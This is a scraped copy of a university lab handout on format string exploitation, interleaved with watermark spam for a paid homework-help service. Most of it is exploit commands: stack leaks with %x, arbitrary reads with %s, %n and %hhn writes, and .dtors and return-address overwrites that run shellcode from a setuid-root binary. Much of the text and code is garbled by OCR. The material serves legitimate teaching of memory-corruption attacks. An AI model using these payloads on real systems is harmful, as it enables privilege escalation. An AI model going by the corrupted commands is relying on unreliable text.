程序從写來做tring编裡辅导

We will again be using the hacking VM (CompArchitecture) Linux & the programmes for this will be found in the directory booksrc.

Format string example used to gain control of a program

Format parame

What happens i have been a wrong number of parameters?

- 1. Take a look at the code for fmt uncommon2.c
 - \$ gcc fmt_uncommon2.c
 - \$./a.out WeChat: cstutorcs

Why is the third output - b7fd6ff4?

Format String Assignment Project Exam Help

- 2. Take a look at the code & then run fmt_vuln c Email: tutorcs@163.com
 - \$ gcc -o fmt_vuln fmt_vuln.c
 - \$ sudo chown root:root ./fmt_vuln || sudo chmod u+s ./fmt_vuln
 - \$./fmt_vuln testing: /493894 / 6
 - \$./fmt_vuln testing%x

The format character % is interpreted & the output is an address on the stack.

Reading from Arbitrary Addresses

3. The %s format could be used to read from arbitrary memory addresses.

Part of the original format string can be used to supply an address to the %s format parameter

\$./fmt_vuln AAAA%08x.%08x.%08x.%08x

AAAA indicates that the fourth format parameter is reading from the beginning of the format string.

What if the fourth format parameter is %s instead of %x?

It will attempt to print the string located at 0x41414141.

\$ env | grep PATH

Compile getenvaddr. then rup the following: S编程辅导 \$./getenvaddr.ATH./fmlt_vuln

PATH result should be at 0xhffffdd7.

What should yo with the is the following doing? What happens if you add anothe with the iddle?

\$./fmt_vuln (\$\frac{1}{2} \frac{1}{2} \frac{1}{2} \xff\xbf")%08x.%08x.%08x.%s

Writing to Arbi

4. The %s format could be used to read from arbitrary memory addresses. We can also write to an arbitrary address with the %n parameter. This formatting character blows for to save the total bytes formatted into a variable.

Lets overwrite thatest valvariable t Project Exam Help

- \$./fmt vuln \$(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
- \$./fmt_vuln_\$(printf,"\x94\x97\x04\x98")\%x\%x\%n
- \$./fmt vuin \$(printf "\x94\x97\x04\x08")%x%x%100x%n
- $\int ./fmt vuln (printf "\x94\x97\x04\x08")%x%x%180x%n$
- \$./fmt_vuln_\$(printf/"\x94\x97\x04\x08")%x%x%400x%n

The resulting value depends on the number of bytes written before the %n. For example to write / April 1855 valor

- \$./fmt_vuln \$(printf "\x94\x97\x04\x08")%x%x%8x%n
- \$./fmt vuln \$(printf "\x94\x97\x04\x08")%x%x%150x%n

Direct Parameter Access 写代做 CS编程辅导

5. The previous examples required sequential attempts to pass format parameter arguments. To simplify format string exploits, we can use direct parar

This allows para cessed directly using the dollar sign qualifier (e.g. '% the nth parameter and display it as a decimal number cessed directly using the dollar sign

printf("7th \$\frac{1}{2} \frac{1}{2} \frac

7th: 70, 4th Wethat: cstutores

- \$./fmt_vuln AAAA%4\\$x \$./fmt_vuln \$(pere-e print \x94\x97\x04\x08" . \x95\x97\x04\x08" . \x95\x97\x04\x04\x08" . \x95\x04\x08" . \x95\x04\x04\x08" . \x95\x04\x04\x04 . \x95\x04\x04\x04 . \x95\x04\x04\x04\
- \$./fmt_vulr\\$(peti-e 'trint()\\94\\\\$9\\\\08" C'\\\pp\\\x97\\x04\\x08" . "\x96\\x97\\x04\\x08" .

"\x97\x97\x04\x08"")%98x%4\\$n%139x%5\\$n

\$./fmt_vulo_\$(perl _e print 0x94\x97\x04\x08" . "\x95\x97\x04\x08" . "\x96\x97\x04\x08" .

dtors

Binary programs compiled with the GNU compiler use .dtors & .ctors table sections for destructors and constructors respectively. The constructor functions are executed before the main() & destructor functions are executed just before the main() exits with an exit system call. We can declare a function as a destructor by defining the destructor attribute.

- 6. Run the dtors_sample.c
 - \$./gcc –o dtors_sample dtors_sample.c
 - \$./dtors_sample
 - \$ nm ./dtors_sample
 - \$ objdump -s -j .dtors ./dtors_sample
 - \$ objdump -h ./dtors_sample

Format String Vulnerability 写Notesearch S编程辅导

7. Let's return to the notesearch program, used last week, which also contains a format string vulnerability. Look at the code - Can you spot it?

\$./notetaker - 'print "%x. "x10')

\$./noteseard

\$./notetaker

\$./notesearc

\$ export SHELLCODE=\$(cat shellcode.bin)

\$./getenvaddr.SHELLCODE ./notesearch

\$ nm ./notesearch | grep DTOR STUTORS

\$./notetaker \$(printf

"\x62\x9c\x04\x08\x62\x9r\x@\x9r\x@\x9r\x@\x9r\x\\\

\$./notesearch_49143x1: tutorcs@163.com

QQ: 749389476

https://tutorcs.com

Bringing together the last two practicals CS编程铺具

8. Create the following programme & save it as fmt_overflow.c

```
#include <stdio h
#include <
#include <
void good
void bad()
           VeChat: cstutorcs
     printf("bad\n");
        Assignment Project Exam Help
void vuln(char * str)
     char Eutores @ 163.com
     char buffer[512];
     sprir(tf)(b)ffer/"#RRYMr9n4 command: %.400s", str);
     sprintf (outbuf, buffer); //<--- used as a silly copy
     print ("buts: //states: com
}
int main(int argc, char *argv[]){
     vuln(argv[1]);
```

Compile & then run the programme

\$./fmt_overflow `python -c "print 'A'*1000"`

This did not overflow buffer or outbuff, nor did it cause a segmentation fault.

\$./fmt_overflow "%550x"

This overflows outbuff, because buffer is treated as the format character & did cause a segmentation fault - The instruction pointer was overwritten with a bunch of 0x20 bytes, or spaces.

Can you work out how to overwrite the return address with the address of bad()?

Answer at end of Practical 人写代做 CS编程辅导

We can then use this to execute a shell

\$ fmt_overflow " x90\xf6\xff\xbf')\$(printf \$(./hexify.sh smallest_shell))

9. If you wer sight number of bytes (such as an address, like 0x save how many bytes you formatted to the right place (e.g. the return address), you could hijack a program.

You can controlling where we write using '%n'. This format will write how many bytes have formatted to the today passed as argument that matches the '%n'. You therefore need to align & format enough bytes.

Create the following programmental lies ount flow am Help

```
#include <stdio.h>
#include string.ns: tutorcs@163.com
#define BUFFER_SIZE 1024 9476
int main(int argc, char * argv[])
{
     charatettas.com
     static int test value = 0x00414141; //"AAA\0" as an int
     strncpy(buf, argv[1], BUFFER_SIZE);
     printf("Right: ");
     printf("%s", buf);//<----safe
     printf("\n\n");
     printf("Wrong: ");
     printf(buf);
                  //<----vulnerable
     printf("\n\n");
     printf("[*] test_value @ \%p = \%d 0x\%08x\n", &test_value,
     test_value, test_value);
     exit(0);
}
```

\$./vuln fr

We can then ad plant fundating. In the case of printing in hexadecimal it will add '0x' to the start of non-zero values. The next option is adding a number prior to the conversion argument, as in '%#08x'. This conversion will right adjust the format such that the entirety of the number takes up 8 hex digits. The leading 0 will cause the format to fill those blank spaces with 0's

format to fill those blank spaces with 0's roject Exam Help \$./vuln_fmt BBBB:%#08x

Keep adding '.%#08x' to the input until it changes (overwrites) test_value. Once you ad this it hears to the format.

What then happens if your change the last format directive to a '%n'? \$./vuln_fmt BBBB.%#08x.%#08x.%n

If you get a segmentation fault, that means you can now exploit the program. The crash positive the program. The crash positive the program of the program o

To write a single byte, you can plug into the leading B's the address of test_value, which is 0x804a02c. We can use printf to do that:

\$./vuln_fmt \$(printf "\x2c\xa0\x04\x08").%#08x.%#08x.%#08x.%n Unfortunately, this will overwrite the whole target value including the B's, due to writing a whole integer. What we really want to do is get it to write a single value, maybe just that null byte.

For that, use the format directive flag 'h', which specifies using half the format. For example, if you used '%hn' then you are writing the number of formatted bytes to a 2-byte short value. If you use '%hhn', then you are writing the number of formatted bytes to a 1-byte char value.

Run:

\$./vuln_fmt\$(printf) 写代做 CS编程辅导

"\x2c\xa0\x04\x08").%#08x.%#08x.%#08x.%hn

\$./vuln fr "\x2c\xa0\x04\x(**₽**

yte, it needs to be aligned. It is 3 bytes Now you are ab. off, but that is e nging the address of where you are writing to:

\$,/vuln fmt \$(printf

"\x2f\xa0\x04\x08").%#08x.%#08x.%#08x.%hhn

You can now write as ingle atte, 6 Still to 16 Cou control what you write?

'%n' writes the number of bytes formatted so far, & you can control how many bytes are provided to the format po just have to increase of bytes.

This means, for every additional byte added before the '%n', the value of the byte written sincreased by proper experimenting with the input:

\$./vuln_fmt \$(printf

"\x2f\xa0\x04\x08")A\\ \%#08x\\ \%#08x\

"\x2f\xa0\x04\x08")AA.%#08x.%#08x.%#08x.%hhn

8x.%#08x.%hhn

Adding individual values to get the value needed takes effort. The format directive flags can be used to help this, by arbitrarily increasing the length of an output by padding 0's

- \$./vuln_fmt \$(printf "\x2f\xa0\x04\x08").%#08x.%#08x.%#08x.%hhn
- \$./vuln_fmt \$(printf "\x2f\xa0\x04\x08").%#08x.%#08x.%#016x.%hhn
- \$./vuln_fmt \$(printf "\x2f\xa0\x04\x08").%#08x.%#08x.%#022x.%hhn
- \$./vuln_fmt \$(printf "\x2f\xa0\x04\x08").%#08x.%#08x.%#0100x.%hhn

There is still one problem. The first value written to that byte was 0x22. What if you want to write a value less than 0x22? It would seem that you can only add to the format length, not decrease.

What happens when the format length is set such that it formats more than 256 bytes? Experiment with the following & take a look at the output:

As you increase 0xff, you wrap back around to 0x00 then 0x01, etc. Now you have full control on what you write & to where.

The final test is to write buttiple bytes. The doar is to write oxdeabeer over the target. The first thing to do is to write '0xbe' to the byte you were messing with before.

tutorcs@163.com

You were actually writing '0x22'. To get to '0xbe' that is an additional 156 bytes in the format.

 $\label{eq:linear_substitution} \$./vuln_fn tt $(printf/49389476) $ \x2f\xa0\x04\x08").\% \#08x.\% \#08x.\% \#0156x.\% hhn$

The result should be close, but still off by 8. The result should be close, but still off by 8.

\$./vuln_fmt \$(printf

"\x2f\xa0\x04\x08").%#08x.%#08x.%#0164x.%hhn

You can now write the next byte. This is achieved by adding another '%hhn' to the format string, & again, this format directive needs to have an address filled.

\$./fmt_vuln \$(printf "\x2f\xa0\x04\x08")\$(printf "\x2e\xa0\x04\x08")\$#08x.%#0164x.%hhn.%hhn

But, you have changed the format length. Now you have got to do the whole calculation again ... but as usual, there is a better way.

Instead of doing these calculations, one at a time, take advantage of the format directives you've learned & try & be smart about things. First, get everything setup so that you have all your '%hhn' formats to write to each of the bytes in the target variable.

If you look close you will see it is doing argument indexing to show the ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you can change you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the you will see it is doing argument ength. You now have a group of '%x' referencing the your ength. You now have a group of '%x' referencing the your ength. You now have a group of '%x' referencing the your ength. You now have a group of '%x' referencing the your ength. You now have a group of '%x' referencing the your english the

Now it is just a matter of changing the '%x' that match the addresses you want to write to '%hhn' & then manipulating the number of 0's in the output.

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The output will start fix all You now need to change this to start 0xde. That requires 196 additional bytes. The first %1\$08x changes into %1\$0204x (that is, you were printing up to 8 leading 0's, now you need 196 more to reach 204 leading 2005) 476

Now, you need to change 0xe8 into 0xad. That will require overflowing & coming back around, which means you need 0xff-0xea+1 to re-zero then additional 0xad bytes to write, or 195 additional bytes. You started by formatting 0x8, that means you need to change the second %x to have 205 leading zeros.

\$./fmt_vuln \$(printf "\x2f\xa0\x04\x08")\$(printf "\x2e\xa0\x04\x08")\$(printf "\x2d\xa0\x04\x08")\$(printf "\x2c\xa0\x04\x08")\$(printf "\x2c\xa0\x04\x08").%1\\$0204x.%4\\$hhn.%1\\$0205x.%\5\\$hhn.%1\\$08x.%\6\\$hhn.%1\\$08x.%\7\\$hhn

Two things left to do. You have 0xb7, which needs to become 0xbe, an additional 7 bytes, so you need to change the next %x to use 15 leading zeros.

"\x2c\xa0\x04\x08").%1\\$0204x.%4\\$hhn.%1\\$0205x.%\5\\$hhn.%1 <u>0/4\\$∩0×</u>.%\7\\$hhn

eeds to become 0xef. This requires 39 Finally, you hav last %x needs to be changed to 47. additional leadir

a0\x04\x08")\$(printf \$./fmt_vu..... 204x.%4\\$hhn.%1\\$0205x.%\5\\$hhn.%1 \\$015x.%\6\\$hhn.%1\\$047x.%\7\\$hhn

And that should give you hat: cstutorcs
If you wish to continue with this, overwriting the Return Address using a Format to exploit it. Take a look at these webpages from the US Naval Academy, section Ssignment Project Exam Help https://www.usna.edu/Users/cs/aviv/classes/si485h/s17/units/06/unit.html

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Answer to Q 8 \$./fmt_overflow 程566(太in后\龙城路x64566)程辅导

To get this, you product the right number of extended format to hit the return address the check the dmes will be the return address. The right number of extended format to hit rst experiment using 0xdeadbeef & check the dmes will be the return address.

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